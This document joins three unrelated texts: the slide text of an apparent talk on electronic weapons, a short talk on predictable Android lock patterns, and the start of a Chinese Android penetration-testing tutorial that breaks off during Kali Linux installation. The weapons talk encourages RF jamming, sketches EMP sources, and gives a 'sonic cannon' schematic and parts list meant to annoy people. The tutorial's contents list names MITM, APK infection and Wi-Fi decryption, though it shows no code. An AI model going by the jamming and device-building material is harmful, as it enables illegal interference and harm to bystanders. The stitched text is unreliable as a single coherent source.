This is a simple spark gap transmitter design. It uses few parts, the components will need to be rated for the voltage levels. Off the shelf transmitters I thought about listing sources of transmitters sold off the shelf that could be used as “jammers” but decided not to out anyone. Any HAM radio can be used, There are plenty of places on the net where you can purchase “jammers”. All of this violates FCC regulations and can cause you legal problems. Home Brew transmitters Here is an example Transmitters other than Spark Gap Transmitters can wildly vary in difficulty. EMP An EMP is a electromagnetic wave with enough power that it can create over- voltage situations in wires and traces on circuit boards. This is because the magnetic field from the EMP induces a voltage on the wires/traces this can be 100s or even thousands of volts. What can make a EMP? Creating Long range EMP is a difficult task. All require either the power grid of a small city or involve explosives. Any atomic or nuclear weapon will create an EMP. EMP was first predicted by a guy named Enrico Fermi during the first nuclear test in 1945. There are reports of a non-nuclear EMP weapon in testing/use by the US military during the Iraq wars. One type of non-nuclear EMP weapons is called “explosively pumped flux compression generator”. Another option is to use a large low-inductance capacitor bank discharged into a single loop antenna. Why do we care? RFI/EMI could be utilized to disable anything from GPS to radio communications. Even low power EMP could disable a city block to a city and could damage the infrastructure we all depend on. How would you feel without your latest and greatest smartphone or other tech you rely on? Protection from RFI There are a few ways to protect yourself/your signal from RFI. ●Using spread spectrum/frequency hopping would make “jamming” your signal much harder. ●For data the better your error correction the better your chances of pulling your signal out of the noise. ●Good shielding of the RF components in the transmitter would also help. Protection from EMP Shielding in the form of Faraday cages, and using well shielded and grounded chassis. Distance from whatever is creating the EMP is your safest bet. Projectile Based There are a few devices of electronic origin that fire projectiles as a firearm does. These are: Coil/Gauss gun Rail gun Coil/Gauss and Rail guns The coil/gauss gun fire using a energized wire coil as a electromagnet to pull the projectile down the barrel. The projectile must be ferrous (magnetic). The more advanced gauss guns use many stages of coils fired in sequence to accelerate the projectile. Rail guns use magnetic fields to push a projectile down the rails. They are very power hungry. All of these devices are power hungry. They require specialized design and components Lasers Weaponized lasers are coming of age. There are more military platforms using lasers for defense than an other non traditional weapons. I think everyone here knows how lasers work, so this is just to point out what we have made public. The most powerful military laser that has been made public is the MIRACL laser that is currently based out of White Sands missile range in New Mexico. (anyone up for a road trip?) Just looking around I found about a dozen different projects using “directed energy” weapons for both offensive and defensive roles. For you that have survived thus far. Now as you have all noticed, electronic weapons are all power hungry bastards. How does one feed them? The parts that make them Here are the parts that you will want to understand. And this will help clarify the schematics you will see next Resistors Resistors resist the flow of energy and convert the waste energy into heat. They are used to limit the current or voltage in a circuit. The are rated in Ohms or Ω. Here is the electronic symbol Coils Coils are are also called inductors, they work by storing energy in the form of a magnetic field. They are rated in henries. Usually mH. These are pretty easy to make for the home experimenter Here is the electronic symbol Capacitors Capacitors store energy between two conductive plates separated by a dielectric material. They are measured in Farads, and come in a few flavors. These are also somewhat easy to make at home even for high voltages. Here is the electronic symbol Diode Diodes allow current to flow in only one direction. They also come in many flavors. They are used most often to rectify an A/C voltage and create a DC voltage. Here is one of the the electronic symbols Transistors Transistors are at the most basic electronic switches. They are used in amplifiers of all kinds. Here is one of the the electronic symbols MOSFET MOSFET are similar to transistors but are designed to handle much more power than transistors. Here is one of the the electronic symbols HV Transformers All transformers are based on the same principle. You feed one side of a pair of coils a A/C voltage, it creates a alternating magnetic field thus inducing a voltage in its partner coil. The increase in voltage is based on the number of turns in the coil. For instance a 1:1000 would increase 10V A/C to 10000V A/C The most common transformers we are interested in are neon sign transformers, fly back transformers, ignition coils, and microwave oven transformers. They each have a ratio of at least 1:200. There are many more parts There is no way I could cover all the possible components . Power Supplies The next part we are going to cover some of the common power supplies used with these devices. Marx Generator A Marx Generator is use to change a low voltage source to a high voltage pulse. The construction is caps that are charged in parallel to a given voltage. Once charged the caps are discharged in series multiplying the V * N the number of caps. example: 10 caps @ 120 v would be 1200 V output. Voltage Multipliers This power supply is similar to a Marx Generator This converts a lower AC voltage to a high DC voltage. Humans as Targets The last part of this talk is about the new wave of using our tech on us. These are some of the newer “less than lethal” weapons that are just starting to be used on the public. Less than lethal? The term “non lethal” was initially used on things like stun guns,beanbag,tear gas, and CS based weapons. That is until they started having fatalities. “Heat Rays” These use high frequency microwaves to produce a heat/burning sensation on exposed skin. It is deemed safe because the waves do not penetrate far into the skin. It is currently truck mounted but there is work on a more mobile option. This is named the ADC (Active Denial System) Sea Sickness Flashlight AKA Dazzler This uses a extremely bright light with a random flashing pattern. It was created to cause nausea and disorientation or temp blindness. I think it could also possibly cause seizure in those that are predisposed to that. It was created by a DOD contractor and was recreated by Lady Ada. Sonic Cannon(LRAD) These devices are designed for crowd control, they utilize sound at high db levels (160db), they seem to mostly use either very high or very low frequencies. Low frequencies at high levels are known to cause nausea and vision problems. High frequency will cause headaches and loss of focus. Not to mention your ear drums.150db is the point where most people feel pain. Sonic Cannon pt2 Here is the schematic for a “sonic cannon” I have used in the past. It is a 555 timer in astable mode. I have included a variable resistor so that you can modify the frequency on the fly. I have found that tuning the design for the range just out side your hearing will cause amusing results. Tie the output pin (3) to a speaker. R1: 1k R2: 100,00K Potentiometer C1: 0.01uF Sound Cannon Build I have made a home brew version of the sound cannon. List of parts: IC1: 555 timer R1: 100k variable resistor R2: 470 ohm resistor C1: 0.01 uF cap C2: 1000 uF cap C3: 0.001 uF cap Speakers Breadboard Misc wire. Power Sound Cannon build PT 2 Tips I would suggest first prototyping the circuit on a solderless breadboard to get it working as you want. When working on the final build make sure to use a IC socket. Sound Cannon Build Build the circuit as shown in schematic. C2 is a DC filtering cap that should be put between the output wire and ground. . The resistor values I used should give you a good range of output frequencies in the mostly audible range. Sonic Cannon Done Now you have one hell of a noise maker. Thanks My thanks go to those that helped with this. Wikipedia Randall with XKCD Lady Adafruit Questions and Answers Here is where you ask me questions and I make up some answers.
Tell me who you are and I will tell you your lock pattern Marte Løge 23 years, Norway MSc. Computer Science @NUTS Developer @Itera Humans are… …predictable! How Many Combinations does the Android Lock Pattern Have? 389,112 Length #Combina/ons 4 1624 5 7152 6 26,016 7 72,912 8 140,704 9 140,704 Total 389,112 The Survey Visual Complexity Complexity: [6.3, 46.8] 27.0 46.8 6.34 20.78 All patterns: 13.6 Smartphones: 12.8 Highest score: 44.4 Max score: 46.8 Associations Elements Start node Handedness Right-handed (1) (2) Left-handed (1) (2) 3-gram Sequences Average Pattern Length Women Men ? Questions? Marte Løge @marteloge marte.loge@itera.no
Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 Android 渗透测试入门教程 (内部资料) 大学霸 www.daxueba.net Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 前 言 Kali Linux 是业内最知名的安全渗透测试专用操作系统。它的前身就是业界知名的 BackTrack 操作 系统。BackTrack 在 2013 年停止更新,转为 Kali Linux。Kali Linux 集成了海量渗透测试、网络扫描、 攻击等专用工具。通过系统更新,用户可以快速获取最新的各类工具。所以,Kali Linux 是专业人员的 不二选择。 目前,Android 系统应用非常广泛,主要应用在一些可移动设备上,如智能手机、平板、电视、数 码相机、游戏机等。这些设备被广泛地应用在人们工作和生活中。在这些设备中,往往保存大量的、敏 感的个人信息和商业信息。由于 Android 设备具备一些严重的安全隐患,如基于无线网络通信,更容易 被物理接触,安全措施滞后等。所以,很多黑客选择对该类设备实施攻击。 为了满足用户的需要,本教程针对 Android 设备存在的各种问题,介绍了相应的实施渗透测试方法。 如 Android 设备传输的数据、使用的数据库(SQLite)、程序包的源代码、系统或应用程序中的数据等 问题。通过对 Android 设备实施渗透,可以评估该系统的安全。 1.学习所需的系统和软件  安装 Kali Linux 操作系统  Android SDK 管理器 2.学习建议 大家学习之前,可以致信到 xxxxxxx,获取相关的资料和软件。如果大家在学习过程遇到问题,也 可以将问题发送到该邮箱。我们尽可能给大家解决。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 目 录 第 1 章 Android 渗透测试 ......................................................................................................................... 1 1.1 Android 系统概述 ........................................................................................................................ 1 1.2 什么是渗透测试 .......................................................................................................................... 1 1.2.1 渗透测试工作流程 ........................................................................................................... 1 1.2.2 渗透测试类型 ................................................................................................................... 2 1.2.3 法律边界 ........................................................................................................................... 3 1.3 安装 Kali Linux ............................................................................................................................ 3 1.3.1 在硬盘上安装 Kali Linux ................................................................................................. 4 1.3.2 在虚拟机上安装 Kali Linux ........................................................................................... 14 1.3.3 安装 VMware Tools ........................................................................................................ 20 1.4 Kali Linux 安装后简单设置 ...................................................................................................... 21 1.4.1 配置软件源 ..................................................................................................................... 21 1.4.2 安装中文输入法 ............................................................................................................. 22 1.4.3 设置 VPN 代理 ............................................................................................................... 23 1.5 ADB 工具的安装及配置 ........................................................................................................... 25 1.5.1 安装 ADB 工具 ............................................................................................................... 26 1.5.2 修改用户的环境变量 ..................................................................................................... 31 1.6 ADB 工具的使用 ....................................................................................................................... 33 1.6.1 启动和停止 ADB 服务 ................................................................................................... 33 1.6.2 查看 Android 设备 .......................................................................................................... 33 1.6.3 安装应用程序 ................................................................................................................. 34 1.6.4 卸载应用 ......................................................................................................................... 35 1.6.5 进入设备或者模拟器的 Shell ........................................................................................ 36 1.6.6 上传文件到设备 ............................................................................................................. 37 1.6.7 从设备上下载文件 ......................................................................................................... 38 第 2 章 反编译和审计 Android 应用程序 .............................................................................................. 39 2.1 反编译一个 Android 应用程序 ................................................................................................. 39 2.1.1 查看 Android 应用程序包内容 ...................................................................................... 39 2.2.2 使用 Dex2jar 工具 .......................................................................................................... 41 2.2.3 使用 Apktool 工具 .......................................................................................................... 42 2.2.4 使用 JD-GUI 工具 .......................................................................................................... 44 2.2 审计 Android 应用程序 ............................................................................................................. 46 2.2.1 安装 Drozer 工具 ............................................................................................................ 47 2.2.2 启动 Drozer 工具 ............................................................................................................ 48 2.2.3 Drozer 命令 ..................................................................................................................... 50 2.2.4 Content provider 组件泄露 ............................................................................................. 50 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·II· 2.2.5 遍历文件漏洞 ................................................................................................................. 56 第 3 章 流量分析 ..................................................................................................................................... 58 3.1 外部式被动分析 ........................................................................................................................ 58 3.1.1 配置捕获的环境 ............................................................................................................. 58 3.1.2 启动 Wireshark 工具 ....................................................................................................... 59 3.1.3 设置无线设备的监听模式 ............................................................................................. 62 3.1.4 解密 WEP 加密的包 ....................................................................................................... 65 3.1.5 解密 WPA-PSK/WPA2-PSK 加密的包 ......................................................................... 67 3.2 内部式被动分析 ........................................................................................................................ 70 3.2.1 Tcpdump 工具 ................................................................................................................. 70 3.2.2 配置捕获环境 ................................................................................................................. 72 3.2.3 使用 ADB 工具抓包 ....................................................................................................... 72 3.2.4 使用 ADB 工具抓包方式二 ........................................................................................... 77 3.2.5 捕获 AVD 数据包 ........................................................................................................... 77 3.2.6 使用终端模拟器抓包 ..................................................................................................... 83 3.3 主动分析 .................................................................................................................................... 89 3.3.1 什么是主动分析 ............................................................................................................. 89 3.3.2 主动分析的软件环境 Burp Suite ................................................................................... 89 3.3.3 在模拟器上使用代理 ..................................................................................................... 93 3.3.4 在 Android 设备上使用代理 .......................................................................................... 94 3.3.5 设置 Burp Suite 代理 ...................................................................................................... 95 3.3.6 抓取 HTTPS 数据包 ....................................................................................................... 97 3.5 提取敏感文件 .......................................................................................................................... 105 第 4 章 Android 取证 ............................................................................................................................. 108 4.1 取证的概述 .............................................................................................................................. 108 4.1.1 什么是取证 ................................................................................................................... 108 4.1.2 取证的类型 ................................................................................................................... 108 4.2 实施逻辑取证 .......................................................................................................................... 108 4.2.1 使用 Andriller 提取应用程序的数据 ........................................................................... 109 4.2.2 使用 AFLogical 提取联系人、通话记录和短信 ........................................................ 112 4.2.3 使用 ADB backup 提取应用程序的数据 .................................................................... 124 4.2.4 手动备份应用程序数据库 ........................................................................................... 128 4.3 实施物理取证 .......................................................................................................................... 132 4.3.1 Android 设备文件系统概述 ......................................................................................... 132 4.3.2 Android 文件系统分区 ................................................................................................. 132 4.3.3 使用 dd 命令提取数据 ................................................................................................. 134 4.3.4 获取日志 ....................................................................................................................... 135 第 5 章 SQLite 数据库 ........................................................................................................................... 139 5.1 SQLite 数据库概述 .................................................................................................................. 139 5.1.1 SQLite 数据库工作原理 ............................................................................................... 139 5.1.2 SQLite 的特点 ............................................................................................................... 139 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·III· 5.1.3 SQLite 工具内置命令 ................................................................................................... 140 5.2 使用 SQLite 工具分析应用程序 ............................................................................................. 141 5.2.1 安装和配置 sqlite 应用程序 ......................................................................................... 141 5.2.2 使用 sqlite3 分析数据库 ............................................................................................... 143 5.3 安全评估 .................................................................................................................................. 145 5.3.1 安装和配置 VulnSqlite ................................................................................................. 145 5.3.2 实施渗透测试 ............................................................................................................... 147 5.3.3 实施 SQL 注入 .............................................................................................................. 148 第 6 章 Android 系统攻击 ..................................................................................................................... 153 6.1 WebView 概述 ......................................................................................................................... 153 6.1.1 WebView 组件的使用 .................................................................................................. 153 6.1.2 利用 WebView 漏洞实施渗透测试的方式 ................................................................. 154 6.1.3 什么是 DNS 欺骗 ......................................................................................................... 155 6.1.4 DNS 欺骗环境配置 ...................................................................................................... 156 6.1.5 中间人攻击前配置 ....................................................................................................... 158 6.1.6 实施中间人攻击(DNS 欺骗) .................................................................................. 161 6.1.7 停止攻击 ....................................................................................................................... 168 6.2 感染合法的 APK 包 ................................................................................................................ 168 6.3 AD 库漏洞 ............................................................................................................................... 169 6.4 跨应用程序 .............................................................................................................................. 170 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·4· 第 1 章 Android 渗透测试 Android 是一种基于 Linux 的自由及开放源代码的操作系统,主要用于移动设备,如智 能手机、平板等。目前,大部分用户都使用的是 Android 系统的手机。所以,学习 Android 渗透测试是非常重要的。用户通过对自己的 Android 设备进行渗透测试,可以评估自己的系 统是否安全,或者是否存在有漏洞等。本章将介绍 Android 渗透测试的基础知识。 1.1 Android 系统概述 Android(安卓)是一种基于 Linux 的自由及开发源代码的操作系统,主要用于移动设 备,如智能手机和平板电脑。它是由 Google 成立的 Open Handset Alliance(OHA,开放手 持设备联盟)领导及开发。Android 操作系统最初由 Andy Rubin 开发,主要支持手机。2005 年 8 月由 Google 收购注资。2007 年 11 月,Google 与 84 家硬件制造商、软件开发商及电信 营运商组建开发手机联盟共同研发改良 Android。随后 Google 以及 Apache 开源许可证的授 权方式,发布了 Android 的源代码。第一部 Android 智能手机发布于 2008 年 10 月。Android 逐渐扩展到平板电脑及其他领域,如电视、数码相机、游戏机等。 Android 系统的发展也比较迅速,到目前已经到 Android 5(Lollipop)。每个版本的发 布时间及使用,如表 1-1 所示。 表 1-1 Android版本 版本 代码名称 发布时间 API级别 5.0(Lollipop) 2014年6月26日 21 4.4 KitKat 2013年10月31日 19 4.3 Jelly Bean 2013年7月24日 18 4.2.X 2012年11月13日 17 4.1.X 2012年7月9日 16 4.0.3-4.0.4 Ice Cream Sandwich 2011年12月16日 15 2.3.3-2.3.7 Gingerbread 2011年1月9日 10 2.2 Froyo 2010年5月20 8 1.2 什么是渗透测试 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试 是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。渗透测试的 过程并非简单地运行一些扫描器和自动化工具,该过程中包括对系统的任何弱点、技术缺陷 或漏洞的主动分析。这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有 条件主动利用安全漏洞。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·5· 1.2.1 渗透测试工作流程 渗透测试与其它评估方法不同。通常的评估方法是根据已知信息资源或其它被评估对象, 去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞,去发现是否存在相应 的信息资源。相比较而言,通常评估方法对评估结果更具有全面性,而渗透测试更注重安全 漏洞的严重性。渗透测试通常有七个阶段,如下所示:  前期交互阶段:该阶段通常是用来确定渗透测试的范围和目标的。  信息收集阶段:在该阶段需要采用各种方法来收集目标主机的信息,包括使用社交 媒体网络、Google Hacking 技术、目标系统踩点等。  威胁建模阶段:该阶段主要是使用信息收集阶段所获取到的信息,来标识出目标系 统上可能存在的安全漏洞与弱点。  漏洞分析阶段:在该阶段将综合从前面几个环节中获取到的信息,从中分析和理解 那些攻击途径是可行的。特别是需要重点分析端口和漏洞扫描结果,截取到服务的 重要信息,以及在信息收集环节中得到的其它关键信息。  渗透攻击阶段:该阶段可能是在渗透测试过程中最吸引人的过程。然而在这种情况 下,往往没有用户所预想的那么一帆风顺,而往往是曲径通幽。在攻击目标主机时, 一定要清晰地了解在目标系统上存在这个漏洞。否则,根本无法攻击成功。  后渗透攻击阶段:该阶段在任何一次渗透过程中都是一个关键环节。该阶段将以特 定的业务系统作为目标,识别出关键的基础设施,并寻找客户组织最具价值和尝试 进行安全保护的信息和资产。  报告阶段:报告是渗透测试过程中最重要的因素,使用该报告文档可以交流渗透测 试过程中做了什么、如何做的以及最为重要的安全漏洞与弱点。 1.2.2 渗透测试类型 到现在为止,大家已经对渗透测试的基本技术流程与环节有了一个初步的了解。接下来 介绍一下渗透测试的两种基本类型,分别是黑盒测试和白盒测试。白盒测试有时也被称为“白 帽子”,是指渗透测试者在拥有客户组织所有知识的情况下进行的测试;而黑盒测试是指对 攻击主机一无所知的攻击者所进行的渗透测试。两种测试方法都拥有它们自己的优点和弱点。 下面分别介绍详细介绍这两种类型。 1.白盒测试 使用白盒测试,需要和客户组织一起工作,来识别出潜在的安全风险,客户组织将会向 用户展示它们的系统与网络环境。白盒测试最大的好处就是攻击者将拥有所有的内部信息, 并可以在不需要害怕被阻断的情况下任意地实施攻击。而白盒测试的最大问题在于无法有效 地测试客户组织的应急响应程序,也无法判断出它们的安全防护计划对检测特定攻击的效率。 如果时间有限,或是特定的渗透测试环节如信息收集并不在范围之内的话,那么白盒测试是 最好的渗透测试方法。 2.黑盒测试 黑盒测试与白盒测试不同的是,经过授权的黑盒测试是设计成为模拟攻击者的入侵行为, 并在不了解客户组织大部分信息和知识的情况下实施的。黑盒测试可以用来测试内部安全团 队检测和应对一次攻击的能力。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·6· 黑盒测试是比较费时费力的,同时需要渗透测试者具备更强的技术能力。它依靠攻击者 的能力通过探测获取目标系统的系统。因此,作为一次黑盒测试的渗透测试者,通常并不需 要找出目标系统的所有安全漏洞,而只需要尝试找出并利用可用获取目标系统访问权代价最 小的攻击路径,并保证不被检测到。 不论测试方法是否相同,渗透测试通常具有两个显著特点。  渗透测试是一个渐进的并且逐步深入的过程。  渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。 1.2.3 法律边界 当实施渗透测试时,获取准确的书面授权是非常重要的事情。如果不清楚的话,可能导 致用户面临法律诉讼的问题,更有可能为此锒铛入狱。所以,这里简单介绍一些需注意的法 律边界问题。如下所示:  谁有权利授予这次渗透测试任务?  测试的目的是什么?  测试预计的时间范围是多少?测试中有什么限制,如什么时候可以进行测试?  你的客户指定漏洞评估和渗透测试的区别吗?  你在此次扫描测试过程中会和 IT 安全团队合作吗?你需要测试它们的能力吗?  可以在渗透过程中使用社会工程学攻击吗?可以使用拒绝服务攻击吗?  你能够使用一些物理安全测试方法来测试那些安全服务器、敏感数据存储、或其他 能够物理接触的设备吗?例如,撬锁、仿冒一些员工获得进入大楼的权限、或是进 入那些普通人员通常不能单独访问的区域。  你是否被允许查看网络文件,或者在测试之前告知网络架构来加速测试过程?如果 不明白这一点,可能会影响你得到测试结果的价值。但是在绝大多数业务中,这类 企业信息不会像用户想象的那么容易得到。  允许用户检查的 IP 范围是什么?没有经过正式允许的扫描和测试是法律所不允许 的。用户必须尽力弄清属于客户的网络范围和设备,否则可能会陷于法律指控的危 险之中。  公司的物理位置在哪里?如果允许使用社会工程学攻击,那么这个信息对测试人员 非常重要。因为这能够保证用户身处被测试的建筑物当中。如果时间允许,你应该 让客户指定。尽管他们认为自己的位置信息是保密或者难以发现的,但是你却能够 轻松地从公开渠道获取上诉的信息。  如果测试时遇到一个问题,或测试的最初目标已经达到,你应该做什么?你是否会 继续检查,以发现更多入口或结束测试?这个问题非常重要,它关系到客户为什么 要进行一次渗透测试这一首要问题。  用户需要注意不同国家对信息系统制定的法律不同。在针对渗透测试的法律上,不 是所有国家的法律都是相同的。  一旦通过漏洞攻击了系统,进一步拓展是否需要获得其他许可?这在对分段的网络 进行测试时非常重要。客户可能不会想到,你能够通过内网一台主机作为支点来进 一步渗透内网。  怎样处理数据库?是否允许你添加记录、用户等信息? 在渗透测试时,用户需要做一个列表,列出根据客户要求需要测试的内容。大部分数据 可以从客户那里直接收集,但是还有一些数据需要你们团队进行处理。如果担心法律问题, Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·7· 建议用户咨询一下法律顾问以确保对渗透测试的合法性有一个完全了解。 1.3 安装 Kali Linux Kali Linux 是一个基于 Debian 的 Linux 发行版,该系统主要用于数字取证和渗透测试。 在该操作系统中预装了许多渗透测试软件,如端口扫描器、数据包分析器、密码破解工具等。 用户可以在硬盘、虚拟机、树莓派、USB 上安装该操作系统。本章将介绍在硬盘或虚拟机 中安装 Kali Linux 操作系统。 1.3.1 在硬盘上安装 Kali Linux 下面将介绍在硬盘上安装 Kali Linux 操作系统。在安装之前,首先需要获取 Kali Linux 系统的映像文件。Kali Linux 系统目前最新的版本是 1.0.9a,但是在该版本的安装过程中存 在 Bug。所以,为了使用户的操作更顺利,本小节将介绍 Kali Linux 系统 1.0.9 版本的安装 方法。 Kali Linux 系统 1.0.9 版本的映像文件下载地址是 http://cdimage.kali.org/kali-1.0.9/,如图 1.1 所示。 图 1.1 下载 Kali Linux ISO 映像文件 从该界面可以看到,提供了四个映像文件的下载地址。本书以 64 位操作系统为例,讲 解安装和使用。所以,选择下载 kali-linux-1.0.9-amd64.iso 文件。下载完 ISO 文件后,将该 映像文件刻录到一张 DVD 光盘上。接下来,就可以着手将 Kali Linux 安装至硬盘了。 【实例 1-1】在硬盘上安装 Kali Linux1.0.9。具体操作步骤如下所示: (1)将刻录好的 DVD 安装光盘插入到计算机的光驱中,启动该计算机并在 BIOS 设置 光盘为第一启动项。当系统重新启动后,将显示如图 1.2 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·8· 图 1.2 引导界面 (2)该界面是 Kali 的引导界面,这里选择 Graphical install 选项安装该操作系统。在该 界面使用方向键向下选择 Graphical install 选项(图形界面安装),将显示如图 1.3 所示的界 面。 图 1.3 选择语言 (3)在该界面选择安装系统语言,这里选择 Chinese(Simplified)选项。然后单击 Continue 按钮,将显示如图 1.4 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·9· 图 1.4 确认选择的安装语言 (4)在该界面提示是否要以所选的语言继续安装,这里选择“是”单选按钮。然后单 击“继续”按钮,将显示如图 1.5 所示的界面。 图 1.5 选择区域 (5)在该界面选择用户当前所在的区域,这里选择“中国”选项。然后单击“继续” 按钮,将显示如图 1.6 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·10· 图 1.6 配置键盘 (6)该界面用来配置键盘。这里选择默认的键盘格式为汉语,单击“继续”按钮,将 显示如图 1.7 所示的界面。 图 1.7 加载额外组件 (7)该过程中会加载一些额外组件并且配置网络。当网络配置成功后,将显示如图 1.8 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·11· 图 1.8 设置主机名 (8)在该界面要求设置主机名,这里使用默认设置的名称 Kali。该名称可以任意设置, 设置完后单击“继续”按钮,将显示如图 1.9 所示的界面。 图 1.9 设置域名 (9)该界面用来设置计算机使用的域名,用户也可以不设置。这里使用默认提供的域 名 localdomain,然后单击“继续”按钮,将显示如图 1.10 所示的界面。 图 1.10 设置用户名和密码 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·12· (10)该界面设置根 root 用户的密码。为了安全起见,建议设置一个比较复杂点的密 码。设置完成后单击“继续”按钮,将显示如图 1.11 所示的界面。 图 1.11 磁盘分区 (11)该界面用来选择分区方法。这里选择“使用整个磁盘”选项,然后单击“继续” 按钮,将显示如图 1.12 所示的界面。 图 1.12 选择要分区的磁盘 (12)在该界面选择要分区的磁盘。当前系统中只有一块磁盘,所有这里选择这一块就 可以了。然后单击“继续”按钮,将显示如图 1.13 所示的界面。 图 1.13 选择分区方案 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·13· (13)在该界面选择分区方案,默认提供了三种方案。这里选择“将所有文件放在同一 个分区中(推荐新手使用)”,然后单击“继续”按钮,将显示如图 1.14 所示的界面。 图 1.14 分区情况 (14)该界面显示了当前系统的分区情况。从该界面可以看到目前分了两个区,分别是 根分区和 SWAP 分区。如果用户想修改目前的分区,选择“撤销对分区设置的修改”选项, 重新进行分区。如果不进行修改,则选择“分区设定结束并将修改写入磁盘”选项。然后单 击“继续”按钮,将显示如图 1.15 所示的界面。 图 1.15 格式化分区 (15)在该界面提示是否要将改动写入磁盘,也就是对磁盘进行格式化。这里选择“是” 复选框,然后单击“继续”按钮,将显示如图 1.16 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·14· 图 1.16 安装系统 (16)此时,开始安装系统。在安装过程中需要设置一些信息,如设置网络镜像,如图 1.17 所示。如果安装 Kali Linux 系统的计算机没有连接到网络的话,在该界面选择“否”复 选框,然后单击“继续”按钮。这里选择“是”复选框,将显示如图 1.18 所示的界面。 图 1.17 配置软件包管理器 图 1.18 设置 HTTP 代理 (17)在该界面设置 HTTP 代理地址。当用户设置代理后,该系统中的软件将从代理服 务器上下载。如果不需要通过 HTTP 代理来连接到外部网络的话,直接单击“继续”按钮, 将显示如图 1.19 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·15· 图 1.19 配置软件包管理器 (18)该界面显示正在配置软件包管理器。配置完成后,将显示如图 1.20 所示的界面。 图 1.20 将 GRUB 启动引导器安装到主引导记录(MBR)上吗? (19)在该界面提示是否将 GRUB 启动引导器安装到主引导记录(MBR)上吗?这里 选择“是”复选框。然后单击“继续”按钮,将显示如图 1.21 所示的界面。 图 1.21 将 GRUB 安装至硬盘 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·16· (20)此时将继续进行安装,结束安装进程后,将显示如图 1.22 所示的界面。 图 1.22 结束安装进程 (21)从该界面可以看到,当前操作系统已经安装完成。这时候,需要重新启动计算机 进入系统。所以,这里单击“继续”按钮,将返回到安装系统过程结束安装进程。安装完成 后,将自动重新启动系统。启动系统后,将显示如图 1.23 所示。 (22)在该界面选择登录的用户。由于当前没有创建任何普通用户,所以该界面只显示 了“其他”文本框。此时单击“其他”,将显示如图 1.24 所示的界面。 (23)在该界面输入登录系统的用户名,然后单击“登录”按钮,将显示如图 1.25 所 示的界面。 图1.23 登录系统 图1.24 输入用户名 图1.25 输入登录用 户密码 (24)在该界面输入登录用户的密码。然后单击“登录”按钮,将显示如图 1.26 所示 的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·17· 图 1.26 登录系统界面 (25)该界面就是成功登录 Kali Linux 后的默认桌面。接下来,用户就可以在该系统中 使用各种工具实施 Android 渗透测试了。 1.3.2 在虚拟机上安装 Kali Linux 虚拟机(Virtual Machine)指通过软件模拟具有完整硬件系统功能的、运行在一个完全 隔离环境中的完整计算机系统。虚拟机通过生成现有操作系统的全新虚拟镜像,它具有与真 实操作系统(包括 Windows 和 Linux)完全一样的功能。 当用户进入虚拟系统后,所有操作都是在这个全新的独立的虚拟系统里面进行,可以独 立安装运行软件、保存数据、拥有自己的独立桌面、不会对真正系统产生任何影响,而且具 有能够在现有系统与虚拟镜像直接灵活切换的一类操作系统。下面将介绍在虚拟机上安装 Kali linux 操作系统。 目前流行的虚拟机软件有 VMware、Virtual Box 和 Virtual PC。本节将以 VMware Workstation 虚拟软件为例,介绍安装 Kali Linux 的方法。VMware Workstation 虚拟软件支持 Windows 和 Linux 操作系统,目前最新版本是 11.0.0。其中,所有 VMware 产品的下载地址 为 https://my.vmware.com/cn/web/vmware/downloads。在下载界面选择 VMware Workstation 产品,将显示如图 1.27 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·18· 图 1.27 下载 VMware Workstation 从该界面可以看到,VMware Workstation 可以安装在 Windows 和 Linux 系统中。本书 选择将该软件安装到 Windows 操作系统,所以选择下载 VMware Workstation 11.0.0 for Windows。下载完后,通过双击下载的软件名根据提示进行安装。由于该软件的安装方法比 较简单,所以这里不做介绍。 【实例 1-2】在虚拟机上安装 Kali Linux 操作系统。具体操作步骤如下所示: (1)启动虚拟机软件 VMware Workstation,将显示如图 1.28 所示的界面。 图 1.28 VMware Workstation 11 主界面 (2)在该界面单击“创建新的虚拟机”图标,将显示如图 1.29 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·19· 图 1.29 新建虚拟机向导 (3)该界面选择安装虚拟机的类型,包括“典型”和“自定义”两种。这里推荐使用 “典型”的方式,然后单击“下一步”按钮,将显示如图 1.30 所示的界面。 图 1.30 安装客户机操作系统 (4)在该界面选择如何安装客户机操作系统。这里选择“稍后安装操作系统”,然后 单击“下一步”按钮,将显示如图 1.31 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·20· 图 1.31 选择客户机操作系统 (5)在该界面选择要安装的操作系统和版本。这里选择 Linux 操作系统,版本为“其 他 Linux 3.X 内核 64 位”,然后单击“下一步”按钮,将显示如图 1.32 所示的界面。 1.32 命名虚拟机 (6)在该界面为虚拟机创建一个名称,并设置虚拟机的安装位置。设置完成后,单击 “下一步”按钮,将显示如图 1.33 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·21· 图 1.34 指定磁盘容量 (7)在该界面设置磁盘的容量。如果有足够大的磁盘时,建议设置的磁盘容量大点, 避免造成磁盘空间不足。这里设置为 80GB,然后单击“下一步”按钮,将显示如图 1.35 所 示的界面。 图 